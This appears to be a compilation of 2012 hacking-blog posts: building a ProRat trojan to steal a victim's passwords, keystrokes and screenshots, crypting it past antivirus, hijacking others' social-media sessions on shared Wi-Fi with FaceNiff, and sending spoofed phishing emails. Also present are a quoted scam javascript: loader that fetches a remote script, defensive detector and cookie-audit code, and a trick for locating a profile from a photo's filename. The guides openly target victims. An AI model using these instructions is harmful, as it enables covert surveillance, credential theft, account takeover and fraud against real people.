Monday, 9 January 2012

Hiding RATs, Trojans and Keyloggers from Antivirus

Recently, Zain posted how to make a Pro Rat server to hack a victim's computer in order to get all the saved passwords for Facebook, Twitter, and many others. You may also get screenshots of the infected computer. Today, I am telling you how to hide such servers, Trojans, RATs and keyloggers from antivirus, since all are of the same kind. Here we shall use a simple piece of software; hex editing can also be used to make this possible, and later I will post about hex editing too. Don't worry, hackersthirst will be a complete guide for those beginners who want to learn such things in order to become more secure.

This program is used by programmers and other experts to make their software secure from crackers and hackers. We shall use it to make our trojans, servers, keyloggers and much more secure in order to hide them from antivirus.

Steps:
1) First of all, download this software from here.

2) After downloading the application, install it and then run it. Once it is running, load the application or trojan that you want to hide from antivirus, like this:

3) Select the following options, like I did below:

4) Now select the following options and protect your server or trojan.

You are done. You will see that an old and a new file have been created in the same folder, like below. I have tested this for Pro-Rat.

Checking With Antivirus:
So, now let's scan with an updated antivirus:

You may check it with other antivirus programs; I have scanned using an updated antivirus (Eset, as you can see).

Note: You can also use Cyber-gate instead of Pro-Rat. Also, this trick doesn't work for all keyloggers and RATs.

Pro Rat Trojan - Spy Others Computer (Hack Facebook, Twitter Passwords)

In this post you will learn to make a Pro Rat trojan, with which you will be able to hack the whole victim computer, including all the saved passwords for Facebook, Twitter and other email IDs. Seems interesting, so let's start!

What Is Pro Rat Trojan?

In short, Pro Rat trojan is a type of trojan which uses its spying ability to spy on your victim's computer and lets you control it.

Making Of Pro Rat Trojan:

Generally there are a lot of ways to make a Pro Rat trojan, but I shall teach you the easiest way to make it. The things you need for it are given below:
Log on to no-ip.com and register an account there. (I leave this easy part to you, as you probably have experience of signing up.)

Now download their DNS update client. Run it, use it to update your hostname, and save it.

Now we will PING our host to check whether our host IP has been associated with the chosen server or not.

WHAT IS PING?

It is a good question. Ping is a program that sends a series of packets over a network or the Internet to a specific computer in order to generate a response from that computer. The other computer responds with an acknowledgment that it received the packets. Ping was created to verify whether a specific computer on a network or the Internet exists and is connected.

Back to the point.

Go to RUN and enter CMD. A window will pop up; it is the command prompt, and you can guess what it does from its name. Now enter PING *NAME OF YOUR HOSTNAME* in it and press Enter, and it will reply with your IP.

After making sure that you are connected to the chosen server, move to the folder where you installed Pro Rat and open pro rat.exe. A window will pop up; now refer to the photo given below.

Click on Create and then click on Create Pro Rat Server as shown. A window will now open and ask for the necessary information; refer to the other photo given below.

After filling in the options, click on Create Server and your server will be ready to give out to your victim. Attach it to a file or give it directly to your victim. I leave that to you.

Note: You can use many social engineering tricks to send the file to the victim. You may also ask the victim to turn off antivirus, it's a new game. Later I shall post about how to hide your server from antivirus.

When the victim runs the server, open Pro Rat again, go to Pro Connectivity and click on the button given below; for more, refer to the photo:

Thus you can do lots of things using it. You can log all the keys pressed by the victim, take screenshots of his PC, and much more.

Countermeasures Against Trojan:
The only way to keep your computer safe from trojans is to keep it up to date with an antivirus, and to use AVG or Norton antivirus. The best way is to install Process Explorer, which lets you see trojans on your computer and reverse them.

Bypassing New (theater) Photo Viewer in Facebook

Facebook is doing a lot of new things with itself. Its developers are trying to make it more and more user friendly. However, many people have their own specific tastes, and not everyone will like the new and updated Facebook. Recently, Facebook upgraded its image viewer. A lot of people didn't like this change, me included, as it is annoying. Therefore I am posting some tricks to bypass it and go back to the classic photo viewer instead of the new theater photo viewer. The new photo viewer looks like this:



The following are the ways in which we can bypass it!

1) Skipping the new photo viewer by pressing F5:

Yes, it's a small and quite handy trick with which you can easily bypass the new photo viewer. After opening the photo, press the F5 key on your keyboard and you will be back in the classic photo viewer.

2) Using Right Click:

Whenever you open a photo, just right-click on its thumbnail and, as you are most likely on a recent browser, choose "Open link in a new tab". That's it; you will see that the photo is shown in the new tab in classic mode. If you are on an old browser, just choose "Open link in a new window".

3) Removing "&theater" from the link:

Here is another smart trick. Open the photo by clicking on it and, when the new viewer has loaded, go to the browser address bar. Here you will see "&theater" in the URL of the photo. Remove it by selecting it and hitting Backspace, then hit Enter, and you will be in the classic photo viewer again.

4) Using Facebook LightBox Killer, Permanent solution:

Well, the smart tricks that I described above will also be irritating for you and will take time, except for the right-click method. So here is a permanent solution for bypassing this irritating Facebook picture viewer. I am going to give you an add-on developed by BetterFacebook. The name of the add-on is Facebook LightBox Killer, and it is supported on Chrome as well as Firefox. Navigate to betterfacebook.net and install this trustworthy add-on. It has many features; some are below:
Highlight New Comments
Themes
Automatically Remove "RECENT ACTIVITY" From Your Profile
Enlarge Thumbnails On Hover
Disables Light Box
And much more. You can choose which of the many options you want to activate or disable. After installing the add-on, disable the light box like this:

Facebook Profile Stalker (Who is Viewing Your Facebook Profile) - Facebook Scam

I have seen many people getting infected by such scams, and these scams also spread because of people's foolishness, as they are not very aware of security and common social engineering tricks. Recently I came across a new Facebook scam, and so I decided to write a post at hackers thirst about it.

"Who is Viewing your Facebook Profile" is a scam (commonly called Facebook Profile Stalker):-

Yes, this is absolutely a scam. It states that Facebook users can find out how many people have viewed their Facebook profile if they use its application. But let me tell you that all such things are totally fake, and you will only get involved in propagating them, via chat messages, inboxes and wall posts to friends' walls, without knowing that you are propagating a spammy scam application. In other words, it is a lame application which will just involve you in spam. So, don't follow links which claim that you will be able to find out who has viewed your profile.

How this Scam Works:-

First of all, one of your friends uses this scam to find out who has viewed his profile. After that it gets posted on your wall, and out of curiosity you click the link. Your IP address is then used to locate you and, say you are in Lahore, Pakistan, the following dialog box will appear:
This is lame, and 5 is only a fake number. After that you will be asked to carry out the following steps, like copying the JavaScript and then pasting it into your browser address bar while using Facebook. See the pic:

After this you will copy the script, paste it into the browser address bar and hit Enter while using Facebook, as told in this hack. But stop: have you checked that JavaScript? All the scam and auto spamming is based on that script. I have checked that JavaScript now!

What that Profile Stalker Fake JavaScript Will Do:-

First of all, if you know JavaScript, then you can find the path of the script in the "Copy This Text" dialog box. See below:
javascript:(a=(b=document).createElement('script')).src='/ajnachakre.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)
The bolded portion (the quoted path assigned to src) is the path of the script. You can put that path in the browser address bar and hit Enter; after that you can easily see the code in front of you in the browser.

First Section of the Script:
It will create a dialog box saying "Please Wait Loading Your results", as you can see below (the background is set to a picture hosted at Tinypic):

Second Section of the Script, After Asking You to Wait:
After that it will send the highlighted spam messages:

Where These Spam Messages Will Be Posted:
1) In chat messages to friends
2) To the inboxes of friends
3) To the walls of friends
4) On your own wall
I have given all these stats after checking this JavaScript.

What Else It Will Do:
It will automatically make you a fan of those Facebook pages whose IDs are given in the JavaScript, as in the screenshot below:

Conclusion:

Don't click on or use applications which claim that you will find out how many people have viewed your profile. Also, never put JavaScript in your browser address bar while browsing Facebook. And don't use links claiming "OMG!", "Look what an amazing..." and the like!
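The check below is an added example, not code from the original post or from the scam script. It inspects text that a page asks you to paste into the address bar and reports whether it is a javascript: URL that loads an external script, which is the pattern of the "Copy This Text" string quoted above. The function name and verdict strings are assumptions made for illustration.

```javascript
// Added example: SCAM_SAMPLE is the string quoted in the post; the function
// name and verdict wording are hypothetical.
const SCAM_SAMPLE =
  "javascript:(a=(b=document).createElement('script')).src='/ajnachakre.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)";

function analyzePastedUrl(text) {
  const input = text.trim();
  const finding = { isScriptUrl: false, injectsScriptTag: false, remoteSources: [], verdict: 'ok' };

  // The scheme is case-insensitive and the URL parser drops tabs and newlines,
  // so allow whitespace between the letters of "javascript:".
  const scheme = /^j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/i.exec(input);
  if (!scheme) return finding;
  finding.isScriptUrl = true;

  let body = input.slice(scheme[0].length);
  try { body = decodeURIComponent(body); } catch (e) { /* malformed %-escape: keep raw body */ }

  // Loader pattern: create a <script> element, then attach it to the document.
  const createsScript = /createElement\s*\(\s*['"]script['"]\s*\)/i.test(body);
  const attaches = /\.(appendChild|insertBefore|append)\s*\(/.test(body);
  finding.injectsScriptTag = createsScript && attaches;

  // Every string literal assigned to .src is a script the page would fetch.
  const srcAssign = /\.src\s*=\s*(['"])(.*?)\1/g;
  let m;
  while ((m = srcAssign.exec(body)) !== null) finding.remoteSources.push(m[2]);

  finding.verdict = finding.injectsScriptTag || finding.remoteSources.length > 0
    ? 'block: loads an external script into the current page'
    : 'warn: script URL runs with the current page\'s session';
  return finding;
}
```

Any code run this way executes inside the logged-in Facebook page, which is why the script can post and send messages as the user.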

Find Any Facebook Profile By using Picture

Today I'll discuss a short and smart trick with which you can easily locate any Facebook profile within seconds. What matters is that the picture must have the unique name in which the address of the person's profile is hidden. It may help you some day, which is why I am sharing this trick. First, go to the picture and look at the name with which it has been saved anywhere. It must consist of numbers with "_n" at the end.
Let's take a picture and inspect its name. We find the following name for the picture:
23213_100000967034368_1371_n
Now we have to find the profile address from it. Just ignore the 23213 at the start and the 1371_n at the end, copy the middle snippet of numbers, 100000967034368, and paste it into Notepad.
Now, take this URL:
http://www.facebook.com/profile.php?id=
And paste the snippet of numbers which you put in Notepad just after it, like this:
http://www.facebook.com/profile.php?id=100000967034368
Copy this whole URL, paste it into the browser address bar and hit Enter. After this you'll see the Facebook profile of the person whose picture it was in front of you. A small trick, but a useful one in some cases.

Hijack into Facebook, twitter or YouTube accounts using just an Android phone


We will be using only an Android phone. This is very useful if you want to hack a Facebook account of someone and you don't have a laptop. People would even think you were only texting. Here's what you will need:

1- Any Android phone with an app called "FaceNiff"
2- And a bit of brain

Yep, that's all. You can download FaceNiff at their website:-
Download FaceNiff

Regardless of whether the network is encrypted with WEP, WPA-PSK or WPA2-PSK, as long as you are on the same local area network or Wi-Fi you could easily sniff and hijack anyone's Facebook, Twitter or YouTube account as long as they are logged in.

Steps Used to Hijack accounts using FaceNiff:-

Here are the steps for hijacking an account:
1. Connect to the network and open the FaceNiff app.

2. Click the red button and it will then turn green when the sniffer is on.

3. Press the enter button and it will show a list of all the accounts you could hijack.

4. Click the account you like and you will automatically be logged in.

5. Do what you want with the hacked account.

This works by stealing their cookies and setting them as your own. Therefore you can log in without even knowing his username or password. Enjoy.
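Because the hijack described above relies on the session cookie crossing the shared network where another device can read it, the site-side defence is to make sure that cookie is only ever sent over HTTPS. The audit below is an added example, not part of the original post; the header values and the cookie name sid are constructed samples.

```javascript
// Added example: flag session cookies that a browser would send over plain
// HTTP on a shared network. WEAK and HARDENED are constructed header sets.
const WEAK = [
  ['Content-Type', 'text/html'],
  ['Set-Cookie', 'sid=4f9c1a; Path=/'],
  ['Set-Cookie', 'lang=en; Path=/'],
];
const HARDENED = [
  ['Strict-Transport-Security', 'max-age=31536000; includeSubDomains'],
  ['Set-Cookie', 'sid=4f9c1a; Path=/; Secure; HttpOnly; SameSite=Lax'],
];

// Split one Set-Cookie value into its name and the attribute flags we care about.
function parseSetCookie(value) {
  const [pair, ...attrs] = value.split(';').map(p => p.trim());
  const eq = pair.indexOf('=');
  const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
  return {
    name: eq < 0 ? pair : pair.slice(0, eq),
    secure: flags.has('secure'),
    httpOnly: flags.has('httponly'),
  };
}

// headers: array of [name, value]; sessionNames: cookies that authenticate the user.
function auditSession(headers, sessionNames) {
  const issues = [];
  const hsts = headers.some(([k]) => k.toLowerCase() === 'strict-transport-security');
  if (!hsts) issues.push('no HSTS: the first request may still go out over plain HTTP');
  for (const [k, v] of headers) {
    if (k.toLowerCase() !== 'set-cookie') continue;
    const c = parseSetCookie(v);
    if (!sessionNames.includes(c.name)) continue; // preference cookies are not the target
    if (!c.secure) issues.push(`${c.name}: missing Secure, sent on http:// requests`);
    if (!c.httpOnly) issues.push(`${c.name}: missing HttpOnly, readable by page script`);
  }
  return issues;
}
```

For the weak set, auditSession(WEAK, ['sid']) reports the missing HSTS header and both missing flags on sid; the hardened set reports nothing.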


Sending Fake/Spoofed Emails (How to guide and Purpose)

A large number of people are using these fake email utilities to fool and defraud innocent people, but today I will show you how hackers make it possible and what they want to do by using these emails. The purposes are many, but I will discuss some of the common ones here. I will also show you many free online services which allow you to send these fake emails, and likewise how we can make such a service on our own. So, fake emails can be sent by:

1. Using any free or premium online fake email service (there are millions like this)
2. Sending such emails using a PHP script. (You can make your own.)

So, let's discuss these first:
1) Using Fake Email Services:
There are many free as well as premium online services for sending fake emails from any address you want, with any name and with any content attached to the email. Premium services will give you more options, but free ones can also be used. Here are two fake email senders:
AnonyMailer>>Free Fake Email - Send Fake Mail Pranks Anonymously for Free
Emkei Fake Mailer>>Free Fake email with more options-Attachments also

Search at Google.com>> Free Fake email Services, and you will get many.

2) Using Fake Email PHP Script:
Download the script for sending fake emails from here.
(Alternate download here)
You will need hosting, and not an ordinary one: this script will only work on hosting which allows sending emails.
One of them is x10hosting.com; another you may use is 000webhost.com. Search Google for more.
Make an account at any one of the above hosts and upload your script.
Now navigate to www.youweb.com/sendmail.php, just fill in the fields and send emails.
>>A paid hosting is good for this purpose.
Note: Don't use this to spam. Effective Earning is not responsible for bad usage of this script.

To learn how to upload your files to free or paid hosting, go here.

Why Hackers Use Fake Emails?
a) The main reason is fraud. They can fool you by using your boss's email ID and sending a warning telling you to do this or else you will be fired, etc.
b) They can be used to hack your social email accounts, or your Gmail account, let's say. See the pic below, in which a hacker is sending a fake email:

Now the hacker is trying to fool the victim by hyperlinking his phishing page (of Gmail). People now know that www.gmail.anyweb.com will be a fraud page, so hackers use some common social engineering tips. When I click the link I won't look at the URL in the browser (a common browsing attitude), since I want to get my donation as early as possible; therefore I will log in and will lose my password.

Beyond this, if you have common sense you can estimate how these fake emails can be used. So, always be sharp enough to catch such emails, and always look at the browser URL after clicking links such as "login from here". Well, practically, why would someone ask you to log in to Gmail, Yahoo, MSN or Facebook from an email?
Think......
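The hyperlink trick described above can be caught mechanically before the user ever clicks. The function below is an added example, not code from the original post: it pulls the anchors out of an HTML e-mail body and flags links whose visible text names one host while the href goes to another, or where a brand such as gmail appears only as a label of someone else's domain. TRUSTED is an assumed allow-list, and the comparison is a plain suffix match rather than a Public Suffix List lookup.

```javascript
// Added example, not from the original post. TRUSTED is an assumed allow-list and
// SAMPLE_BODY is a constructed e-mail body; only www.gmail.anyweb.com comes from the page.
const TRUSTED = { gmail: ['google.com', 'gmail.com'], facebook: ['facebook.com'] };

// Hostname of a URL or bare host string, or null if it does not parse.
function hostOf(s) {
  const withScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(s) ? s : 'http://' + s;
  try { return new URL(withScheme).hostname.toLowerCase(); } catch (e) { return null; }
}

// True when host is the domain itself or a subdomain of it.
const under = (host, domain) => host === domain || host.endsWith('.' + domain);

function checkLinks(html) {
  const findings = [];
  const anchor = /<a\b[^>]*\bhref\s*=\s*(["'])(.*?)\1[^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = anchor.exec(html)) !== null) {
    const href = m[2];
    const text = m[3].replace(/<[^>]+>/g, '').trim();
    const target = hostOf(href);
    if (!target) continue;
    const reasons = [];

    // 1. The visible text is itself a host or URL, but the href goes somewhere else.
    const looksLikeHost = /^(https?:\/\/)?[\w-]+(\.[\w-]+)+(\/\S*)?$/i.test(text);
    const shown = looksLikeHost ? hostOf(text) : null;
    if (shown && !under(target, shown)) reasons.push(`text shows ${shown}, link goes to ${target}`);

    // 2. A brand appears as a label of an unrelated domain (gmail.anyweb.com) or in
    //    the link text, while the host is not under any of that brand's domains.
    for (const [brand, domains] of Object.entries(TRUSTED)) {
      const named = target.split('.').includes(brand) || text.toLowerCase().includes(brand);
      if (named && !domains.some(d => under(target, d))) reasons.push(`${brand} named, host is ${target}`);
    }
    if (reasons.length) findings.push({ href, text, reasons });
  }
  return findings;
}

const SAMPLE_BODY =
  '<p>Claim your donation: <a href="http://www.gmail.anyweb.com/login">www.gmail.com</a></p>' +
  '<p><a href="https://mail.google.com/">Open Gmail</a></p>';
```

Run on SAMPLE_BODY, only the first link is reported, with both reasons; the genuine mail.google.com link passes.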